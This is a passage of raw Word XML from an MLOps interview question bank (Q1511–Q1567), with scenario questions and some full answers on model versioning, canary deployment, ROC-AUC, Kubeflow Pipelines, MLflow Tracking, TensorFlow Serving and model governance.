        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1511. MLOps situation - flaky retraining pipeline: A retraining pipeline fails intermittently and teams rerun it manually. How would you stabilize it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1512. MLOps situation - canary disagreement: Technical metrics look good in canary, but support tickets increase. How do you investigate and decide rollout?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1513. MLOps situation - compliance audit: An auditor asks how a prediction made three months ago was produced. What evidence should your platform provide?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1514. MLOps situation - multi-team platform conflict: One team needs fast experimentation while another needs strict approval gates. How would you design the platform for both?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1515. MLOps situation - stale features: Online feature values are stale but the model endpoint is healthy. How do you detect, mitigate, and redesign?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1516. MLOps situation - disaster recovery: The region hosting your model registry and artifacts is unavailable. How would you continue serving and recover safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1517. MLOps situation - interview unknown: You are asked about an MLOps tool you have not used directly. How do you answer honestly while still showing strong engineering judgment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1518. Multi-tenant AI platform: How would you design tenant isolation, quota enforcement, and cost attribution for an internal platform that serves LLM access to multiple product teams?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1519. Resume deep-dive - Vertex AI Pipelines: Walk me through a Vertex AI Pipeline you built end to end, from training through Vertex AI Model Registry to production deployment.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1520. Resume deep-dive - LLMOps stack: You deployed Llama 3, Mistral, Ollama, and vLLM on Kubernetes. How did you choose between them and scale inference for concurrent users?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1521. Resume deep-dive - model monitoring: You used Vertex AI Model Monitoring and Evidently AI for drift detection with automated retraining. How did you avoid false-positive retrains?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1522. Resume deep-dive - secure MLOps: You implemented IAM, RBAC, Secrets Manager, and Binary Authorization for AI workloads. Walk me through one specific control and the risk it closed.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1523. Resume deep-dive - GitOps for AI: You used ArgoCD and Helm for AI application deployments. How is a GitOps rollout for model-serving different from a normal microservice rollout?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1524. Scenario - hallucinated compliance answer: An LLM-powered support bot gave a customer incorrect regulatory advice that was later escalated. How would you investigate and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1525. Scenario - runaway agent loop: An autonomous agent got stuck in a tool-calling loop overnight and ran up a large API bill. How would you detect this faster and add guardrails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>MLOps Fundamentals (1–100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1526. Why is MLOps important in production ML systems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1527. Explain the ML lifecycle.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1528. What are the stages of an ML pipeline?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1529. Difference between DevOps and MLOps?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1530. What is model drift?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1531. What is data drift?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1532. What is concept drift?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1533. How do you detect drift in production?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1534. What tools are used for drift monitoring?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1535. Explain model versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model versioning is the process of tracking and managing different versions of machine learning models throughout their lifecycle.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps maintain reproducibility, traceability, and governance by storing details such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model artifacts</w:t>
        <w:br/>
        <w:t>* Training datasets</w:t>
        <w:br/>
        <w:t>* Hyperparameters</w:t>
        <w:br/>
        <w:t>* Code versions</w:t>
        <w:br/>
        <w:t>* Performance metrics</w:t>
        <w:br/>
        <w:t>* Environment configurations</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production, model versioning is important because multiple versions of a model may exist for experimentation, testing, rollback, or retraining purposes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For example, if a newly deployed model performs poorly in production, we can quickly roll back to a previous stable version.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Model versioning also helps teams compare model performance, track changes, and ensure compliance and auditability in enterprise environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools used for model versioning include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow￼</w:t>
        <w:br/>
        <w:t>* DVC￼</w:t>
        <w:br/>
        <w:t>* Kubeflow￼</w:t>
        <w:br/>
        <w:t>* Weights &amp; Biases￼</w:t>
        <w:br/>
        <w:t>* Amazon SageMaker Model Registry￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typically, versioning is integrated with CI/CD pipelines and model registries as part of an MLOps workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1536. What is experiment tracking?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1537. Explain ML reproducibility.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1538. What is feature engineering?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1539. What is feature store?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1540. Explain offline vs online features.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1541. What is batch inference?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1542. What is real-time inference?</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Q1543. Explain shadow deployment in ML.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Q1544. What is A/B testing for ML models?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1545. What is canary deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Canary deployment is a deployment strategy where a new version of an application or ML model is released gradually to a small percentage of users before rolling it out to all users.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The goal is to reduce deployment risk by testing the new version in a real production environment with limited traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In this approach:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Most traffic continues going to the stable version</w:t>
        <w:br/>
        <w:t>* A small portion of traffic is routed to the new version</w:t>
        <w:br/>
        <w:t>* Performance, errors, latency, and business metrics are monitored closely</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If the new version performs well, traffic is gradually increased. If issues are detected, the deployment can be rolled back quickly with minimal impact.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, canary deployment is commonly used for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Testing new ML models safely</w:t>
        <w:br/>
        <w:t>* Monitoring prediction quality</w:t>
        <w:br/>
        <w:t>* Detecting drift or performance issues</w:t>
        <w:br/>
        <w:t>* Validating infrastructure changes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Canary deployments are typically implemented using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubernetes</w:t>
        <w:br/>
        <w:t>* Service mesh tools like  Istio￼</w:t>
        <w:br/>
        <w:t>* Ingress controllers</w:t>
        <w:br/>
        <w:t>* Load balancers</w:t>
        <w:br/>
        <w:t>* CI/CD pipelines</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This strategy improves deployment reliability, reduces downtime risk, and enables safer production releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1546. What is model rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1547. How do you monitor ML model accuracy?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1548. What are model performance metrics?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1549. Difference between precision and recall?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1550. What is F1 score?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1551. Explain ROC-AUC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ROC-AUC is a classification performance metric used to measure how well a model can distinguish between positive and negative classes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ROC stands for Receiver Operating Characteristic curve, and AUC stands for Area Under the Curve.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The ROC curve plots:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* True Positive Rate (Recall)</w:t>
        <w:br/>
        <w:t>* False Positive Rate</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>at different classification thresholds.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>TPR = \frac{TP}{TP + FN}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FPR = \frac{FP}{FP + TN}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AUC measures the overall ability of the model to separate positive and negative classes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* AUC = 1 → Perfect classifier</w:t>
        <w:br/>
        <w:t>* AUC = 0.5 → Random prediction</w:t>
        <w:br/>
        <w:t>* Higher AUC indicates better model performance</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ROC-AUC is especially useful for evaluating classification models with imbalanced datasets because it measures performance across all thresholds instead of a single accuracy value.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production ML systems, ROC-AUC is commonly used for fraud detection, medical diagnosis, recommendation systems, and risk prediction models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1552. What is model latency?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1553. What is model throughput?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1554. What is feature drift?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1555. Explain data validation.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1556. What is schema validation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1557. Explain ML pipeline orchestration.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1558. Explain Kubeflow Pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubeflow Pipelines￼ is a workflow orchestration component of Kubeflow used to automate, manage, and monitor machine learning workflows on Kubernetes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It allows teams to build reusable and scalable ML pipelines by defining each stage of the ML lifecycle as independent pipeline components.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typical stages include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data ingestion</w:t>
        <w:br/>
        <w:t>* Data preprocessing</w:t>
        <w:br/>
        <w:t>* Feature engineering</w:t>
        <w:br/>
        <w:t>* Model training</w:t>
        <w:br/>
        <w:t>* Model evaluation</w:t>
        <w:br/>
        <w:t>* Deployment</w:t>
        <w:br/>
        <w:t>* Monitoring</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubeflow Pipelines helps manage:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Task dependencies</w:t>
        <w:br/>
        <w:t>* Scheduling</w:t>
        <w:br/>
        <w:t>* Retry handling</w:t>
        <w:br/>
        <w:t>* Logging</w:t>
        <w:br/>
        <w:t>* Experiment tracking</w:t>
        <w:br/>
        <w:t>* Pipeline versioning</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pipelines are usually written in Python using the Kubeflow SDK, and each step runs as a containerized workload on Kubernetes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Workflow automation</w:t>
        <w:br/>
        <w:t>* Scalability on Kubernetes</w:t>
        <w:br/>
        <w:t>* Reproducibility</w:t>
        <w:br/>
        <w:t>* Reusable pipeline components</w:t>
        <w:br/>
        <w:t>* GPU/CPU resource management</w:t>
        <w:br/>
        <w:t>* CI/CD integration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A pipeline can automatically:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Fetch new data</w:t>
        <w:br/>
        <w:t>2. Validate and preprocess it</w:t>
        <w:br/>
        <w:t>3. Train a model</w:t>
        <w:br/>
        <w:t>4. Evaluate performance</w:t>
        <w:br/>
        <w:t>5. Deploy the model if validation succeeds</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubeflow Pipelines is widely used in production MLOps systems for building automated, scalable, and cloud-native ML workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1559. What is MLflow?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1560. Explain MLflow Tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MLflow Tracking￼ is a component of MLflow used to record, organize, and compare machine learning experiments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps track important experiment details such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Hyperparameters</w:t>
        <w:br/>
        <w:t>* Model metrics</w:t>
        <w:br/>
        <w:t>* Training runs</w:t>
        <w:br/>
        <w:t>* Model artifacts</w:t>
        <w:br/>
        <w:t>* Source code versions</w:t>
        <w:br/>
        <w:t>* Environment information</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Each experiment run is logged and stored so teams can compare different models and reproduce results easily.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>During model training, MLflow Tracking can automatically log:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Learning rate</w:t>
        <w:br/>
        <w:t>* Batch size</w:t>
        <w:br/>
        <w:t>* Accuracy</w:t>
        <w:br/>
        <w:t>* Loss values</w:t>
        <w:br/>
        <w:t>* Trained model files</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This helps identify which experiment produced the best-performing model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits of MLflow Tracking include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Experiment reproducibility</w:t>
        <w:br/>
        <w:t>* Easy comparison of runs</w:t>
        <w:br/>
        <w:t>* Collaboration across teams</w:t>
        <w:br/>
        <w:t>* Better model governance</w:t>
        <w:br/>
        <w:t>* Simplified debugging and auditing</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>MLflow Tracking provides both:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* UI dashboard for visualization</w:t>
        <w:br/>
        <w:t>* APIs for programmatic logging</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, it is commonly integrated into training pipelines, CI/CD workflows, and model registries to manage ML experiments efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1561. What is MLflow Registry?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1562. Explain TensorFlow Serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: TensorFlow Serving￼ is a high-performance model serving system developed by  Google￼ for deploying machine learning models in production environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is mainly used to serve TensorFlow models for real-time inference through REST or gRPC APIs.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>TensorFlow Serving allows models to be:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Loaded dynamically</w:t>
        <w:br/>
        <w:t>* Versioned</w:t>
        <w:br/>
        <w:t>* Scaled efficiently</w:t>
        <w:br/>
        <w:t>* Updated without downtime</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* High-performance inference</w:t>
        <w:br/>
        <w:t>* Model version management</w:t>
        <w:br/>
        <w:t>* REST and gRPC endpoints</w:t>
        <w:br/>
        <w:t>* Hot model reloading</w:t>
        <w:br/>
        <w:t>* Batch request support</w:t>
        <w:br/>
        <w:t>* Kubernetes and Docker integration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, TensorFlow Serving is commonly used for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Real-time prediction APIs</w:t>
        <w:br/>
        <w:t>* Large-scale inference workloads</w:t>
        <w:br/>
        <w:t>* GPU-accelerated serving</w:t>
        <w:br/>
        <w:t>* Canary or blue-green model deployments</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example workflow:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Train a TensorFlow model</w:t>
        <w:br/>
        <w:t>2. Export the model in SavedModel format</w:t>
        <w:br/>
        <w:t>3. Load it into TensorFlow Serving</w:t>
        <w:br/>
        <w:t>4. Expose prediction APIs for applications</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>TensorFlow Serving is widely used because it provides low-latency, scalable, and production-ready ML model serving capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1563. What is TorchServe?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1564. What is BentoML?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1565. Explain Seldon Core.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1566. What is KServe?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1567. Explain model governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model governance is the process of managing, controlling, and monitoring machine learning models throughout their lifecycle to ensure they are reliable, secure, compliant, and auditable.</w:t>
        <w:br/>
        <w:t>It helps organizations maintain transparency and control over how models are developed, deployed, and used in production.</w:t>
        <w:br/>
        <w:t>Model governance typically includes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Approval workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Access control and security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Audit trails</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Compliance tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and drift management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Documentation and reproducibility</w:t>
        <w:br/>
        <w:t>In production MLOps systems, governance is important because ML models can directly impact business decisions, customer experience, and regulatory compliance.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Before promoting a model to production, organizations may require:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accuracy validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias and fairness checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security reviews</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Business approval</w:t>
        <w:br/>
        <w:t>Governance also helps with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Risk reduction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accountability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regulatory compliance</w:t>
        <w:br/>
        <w:t>Common tools used for governance include:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Weights &amp; Biases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cloud model registries and monitoring platforms</w:t>
        <w:br/>
        <w:t>Overall, model governance ensures ML systems remain trustworthy, controlled, and production-ready at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
